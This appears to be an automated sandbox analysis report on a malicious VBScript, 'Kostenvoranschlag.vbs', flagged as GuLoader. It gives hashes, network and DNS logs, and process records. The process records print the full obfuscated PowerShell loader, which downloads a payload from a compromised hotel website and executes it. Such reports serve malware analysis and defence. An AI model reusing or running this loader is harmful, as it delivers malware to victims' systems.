                                          SSDEEP:12288:6EZrX/owfsLnMeSsaSzqg/KA9o3IHrFIL:6QgwsauVK/kFIL
                                          MD5:B96928578115B1191B03CAE7B3845CA1
                                          SHA1:F428A8A24FA8D5B18BCF369C420E3CFC95BB532F
                                          SHA-256:299B31AD6705B0195D90DB6CDF9B12268976E4F7C0ABC89EA3B128F8B3932D50
                                          SHA-512:98926A2DFE28857946183248CBEECA4FD1BDAA4BED8B5BE6FB411A468D105CD61089F0D9FC00A147649EA3447E0DEE658BF601437C9CC5A3FFCD7CE4426E2E00
                                          Malicious:false
                                          File type:ASCII text, with CRLF line terminators
                                          Entropy (8bit):5.106425371862993
                                          TrID:
                                          • Visual Basic Script (13500/0) 100.00%
                                          File name:Kostenvoranschlag.vbs
                                          File size:158'579 bytes
                                          MD5:080a163f1709fc1834429846644abf60
                                          SHA1:998d9f5a1e0c00788d623cec753e34180135eb0c
                                          SHA256:50a0b8b110c99e220f5872fc64fce72363511dcaae0a13a844537872ba349af3
                                          SHA512:94cf9a367b1950cf55441de043dcb23c498d9cbf89fcb677a71498072be9144bedb5b2bc01cef5de9fb9c7ea4a82d2edea17816bc44ef3aca674dd481c46c5ef
                                          SSDEEP:3072:MYiHtveXendAy3yrLRKm+ay3tJuj8Sq2qb0M240PCOLvAtK3qfBHqnzy:LiHtveXendAy3yrslay3tJuj8Sq2qb0k
                                          TLSH:A2F34FD3C9C92A588A461A73DD136B370EA0004E7B2B5F78A3BDC95D658394C59BFBC0
                                          File Content Preview:......Set Pizzabarerne = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")....Set Forskudtes = Pizzabarerne.ExecQuery("Select * from Win32_Process Where Name = 'Kvartalets.exe'")....For Each Ultrasonicated in Forskudtes....for Puncher1
                                          Icon Hash:68d69b8f86ab9a86
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Oct 24, 2024 15:20:08.210983038 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.211024046 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.211042881 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.213944912 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.213968039 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.214026928 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.214040041 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.214066982 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.214096069 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.214911938 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.214929104 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.214975119 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.214987040 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.215012074 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.215030909 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.327580929 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.327605963 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.327687025 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.327756882 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.327801943 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.327826977 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.328053951 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.328073025 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.328151941 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.328166962 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.328221083 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.356703997 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.356767893 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.356836081 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.356906891 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.356959105 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.356959105 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.357821941 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.357877970 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.358028889 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.358028889 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.358103037 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.358156919 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.358177900 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.358195066 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.358233929 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.358268976 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.358305931 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.358306885 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.358320951 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.358401060 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.446358919 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.446422100 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.446551085 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.446551085 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.446583033 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.446608067 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.446638107 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.446647882 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.446667910 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.446681976 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.446698904 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.446711063 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.446748018 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.446779013 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.475220919 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.475265026 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.475325108 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.475383043 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.475421906 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.475447893 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.475930929 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.475982904 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.476020098 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.476032972 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.476068020 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.476089954 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.476341963 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.476385117 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.476429939 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.476443052 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.476470947 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.476490021 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.476839066 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.476880074 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.476922035 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.476933956 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.476984024 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.477004051 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.565311909 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.565380096 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.565515041 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.565515041 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.565553904 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.565568924 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.565620899 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.565635920 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.565649033 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.565681934 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.565711975 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.594168901 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.594187021 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.594369888 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.594403982 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.594474077 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.594646931 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.594702959 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.594736099 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.594752073 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.594784975 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.594806910 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.595210075 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.595248938 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.595292091 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.595304966 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.595367908 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.595367908 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.595695019 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.595735073 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.595767975 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.595782995 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.595817089 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.595838070 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.683763981 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.683813095 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.683868885 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.683893919 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.683923006 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.683962107 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.684099913 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.684266090 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.684331894 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.687810898 CEST49700443192.168.2.7185.181.240.15
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 24, 2024 15:20:02.173819065 CEST | 55574 | 53 | 192.168.2.7 | 1.1.1.1
Oct 24, 2024 15:20:02.189188004 CEST | 53 | 55574 | 1.1.1.1 | 192.168.2.7
Oct 24, 2024 15:20:06.272562027 CEST | 52706 | 53 | 192.168.2.7 | 1.1.1.1
Oct 24, 2024 15:20:06.430505037 CEST | 53 | 52706 | 1.1.1.1 | 192.168.2.7

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 24, 2024 15:20:02.173819065 CEST | 192.168.2.7 | 1.1.1.1 | 0x73f7 | Standard query (0) | Horm5zl_6637.6637.6637.657e | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:20:06.272562027 CEST | 192.168.2.7 | 1.1.1.1 | 0xcf4a | Standard query (0) | www.hotelseneca.ro | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 24, 2024 15:20:02.189188004 CEST | 1.1.1.1 | 192.168.2.7 | 0x73f7 | Name error (3) | Horm5zl_6637.6637.6637.657e | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:20:06.430505037 CEST | 1.1.1.1 | 192.168.2.7 | 0xcf4a | No error (0) | www.hotelseneca.ro | hotelseneca.ro | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 15:20:06.430505037 CEST | 1.1.1.1 | 192.168.2.7 | 0xcf4a | No error (0) | hotelseneca.ro | | 185.181.240.15 | A (IP address) | IN (0x0001) | false
                                          • www.hotelseneca.ro
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49700 | 185.181.240.15 | 443 | 7400 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-24 13:20:07 UTC | 179 | OUT | GET /Perspectivist.snp HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: www.hotelseneca.ro
    Connection: Keep-Alive
2024-10-24 13:20:07 UTC | 478 | IN | HTTP/1.1 200 OK
    Connection: close
    cache-control: public, max-age=0
    expires: Thu, 24 Oct 2024 13:20:07 GMT
    content-type: application/octet-stream
    last-modified: Thu, 24 Oct 2024 10:17:29 GMT
    accept-ranges: bytes
    content-length: 475360
    date: Thu, 24 Oct 2024 13:20:07 GMT
    server: LiteSpeed
    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


Target ID: 0
Start time: 09:20:00
Start date: 24/10/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Kostenvoranschlag.vbs"
Imagebase: 0x7ff640950000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                          Target ID:2
                                          Start time:09:20:01
                                          Start date:24/10/2024
                                          Path:C:\Windows\System32\PING.EXE
                                          Wow64 process (32bit):false
                                          Commandline:ping Horm5zl_6637.6637.6637.657e
                                          Imagebase:0x7ff794b00000
                                          File size:22'528 bytes
                                          MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:3
                                          Start time:09:20:01
                                          Start date:24/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff75da10000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:4
                                          Start time:09:20:01
                                          Start date:24/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. 
xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. 
dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j ');Fritidsklubberne ($Autostandardization);Fritidsklubberne (Blaaklokkers ' kyd$CarpSHo knUmidd L meSemir Deml L.neM num salnK,lli Undn DemgIofbe NonrSpidnFalseIdio.Wat,HDr keCensaS bdd .sse HolrEtagsS bd[ Vig$ Su FHel uBogsrSuabtRusshUdspyDivi]Kidd= elv$ onoMRefoe BlulBe jlkompeNo dmcestsur tt HemyEverk.ffikAttreLatctRip ');$Miljbeskyttelseskonventioners=Blaaklokkers ',nsh$ O.uSUnden ahad .kaeF itrEnrelDem ePrefmTheanUdsairebunCapigCreme butrhyp.n OveePseu.LsniDSta o PoiwFrihnGhoullokko BlnaLystdKalvF UnbiCh llSickeresp( Kul$IganOTa pp,onev Je.eDolmjSpilnnighi CounAug.gElmueW,amrCas,nDueleSple,Wham$FirraArchn Ka.s YodtUudstKonge .arl .ersMeste NonsByfepZaptl egraMoonn I gsSc m)Ind ';$ansttelsesplans=$Balarao;Fritidsklubberne (Blaaklokkers 'Liba$ KonGT isL NonoJiv BKompA autLVest: arkpHemooOpers WebtBro IPol,L StaLAraeaEmueTUnmoiHeguOGyp NPorg= ig(Split eceEKvlnsDommtPaus-Fi uP MelASusstGadeh Sug P rv$Or hALageN,orsSDvrgtOnduTSheeEWreal Ba,S .taeMoolS Sh,PPsykLSestA RumN cars .um)Ocea ');while (!$Postillation) {Fritidsklubberne (Blaaklokkers 'D ou$FladgUd tlEf eoS ivbstera.lupl ra:P eeMPilie enorEntri EyetI.dio ncirCen iViolosejluPicksTranlquinyBar =Spec$FusetGrafrTek uScoleAlas ') ;Fritidsklubberne $Miljbeskyttelseskonventioners;Fritidsklubberne (Blaaklokkers 'P lySNotiTNeimaallerNaadTUfo,-r stsVandlCamoE V deOranpCard Fo s4Palm ');Fritidsklubberne (Blaaklokkers 'Plan$Stn gUlvel aloBissBl.dyAStanLVerd: ruPDehyOUn esDyscTSebriYvinlUniml BilAHeteT esti IsoOBlinn ep=Tril(Esclt Made EutsU.ictOmel-Ank pWhacaNilaTSkr hFrak lip$Bud ATroln rizsr veTFibrTChasEfrillUners.urgEc rcsFeofPInd LSekoA MilNTekss tto)ser ') ;Fritidsklubberne (Blaaklokkers 'Flan$StraGRentlDadeo ubbsmeraLat LDown:N nvYCo udAfgiE FodrMirslcarbiPl ugInvos pantOpsaESulfsChro=Ae.o$SciegforfLSheaOted bB deA KonlBars:N,agbComeiH drLTovrgSkylG ParEUdkar D snAf keMedl+Fre,+Konk% Kry$TestS SigaUllilUframT alEEcclD isiCorrg.arbT cepnSub iFjumN EdigIsopELophRSu 
csAsbe.MammCM llOSelvuP ovnBet,TCoug ') ;$Opvejningerne=$Salmedigtningers[$Yderligstes];}$Katinantergraft12=327303;$Klandret=29217;Fritidsklubberne (Blaaklokkers 'Sega$ di.gMalel layO MilbOrdrA.agel ei:F,rtI,jrnlOpd LInteaRootQTeoru,ille SkraStreb ,uaL tete,aar ,oss=Unde StegSt aE antopsl-VrdiC BalOSignnCeraTMesoESon NMa et .pr lec$ ForAButtN Trosbry,t MaeTKrakeTalllUmbrssal Eondus MarpSondLS prA KonNSkabSSubc ');Fritidsklubberne (Blaaklokkers ' sty$Anteg MuclWai.oInd,bMiniaSorel Ske:InteBMaalointrmMammbCa sy Re,cgul iFun.lObjel uteaHjer Pudd= ind East[Pho SOpsayC assSkartqurteTri.mfoto.FedtC MoooServntr.mv Co eDgnpr DmrtSwe ]B si:Fo s:S,rrFChadrMello Clom me.BVrgeaInspsTempeInfr6Data4ShebSProltKaemr.atriNonpnEfteg,ose(Bi o$rekoIMorgl O,fl PreaSp,nq Vrduf,ane SnoaE.spbAalelTe te Sko) kul ');Fritidsklubberne (Blaaklokkers ' e p$Epa gDepelpre,oFashBRnneaEspuLAspe:AlcafSem.iEnorrUncle A vSSem.IBgebdPresE,uri Mini= tri H mi[TyrksSlriY DumSInchtclogeShipM mrt.InteTForkEvarsx LogTS ua.Acrie onnN ,omC AstO OveDIntei hetNBiblGNote]Subp:Paal:SknjACounSAerocMisoIRi eiMe a.TilsgbjereoxidTMistS ChoTFu drKerai PronAm hGShri( je$WiseBPlatoRejimmultB ,teyTegnc,arsiKetaLG,nilLyriAM ho)Arta ');Fritidsklubberne (Blaaklokkers 'Sl e$KhmeGtolvL HanOViadbF.rfa esslSvin: onfpSymby dillFl,coUjvnr b.rO orlUMuttsFern6Stur9 Rai= C u$.panfBoerIM,rbr soleTo.ds erI alad odgeMark.MyelS keU C,tbTrensA ylTMosrr SteImodfN etrgAnti(Form$,arikDde AtreeTAteliinfanC,una VejN BeiTUopse C srDislGDimeRBl taPeleF ndtWhit1Trek2Prea,Vagt$ProcKUndrl GotABuseNhumed couRDr jEMasttPrer)Horr ');Fritidsklubberne $Pylorous69;"
                                          Imagebase:0x7ff741d30000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1453020255.0000016773913000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          Target ID:5
                                          Start time:09:20:01
                                          Start date:24/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff75da10000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:13
                                          Start time:09:20:12
                                          Start date:24/10/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. 
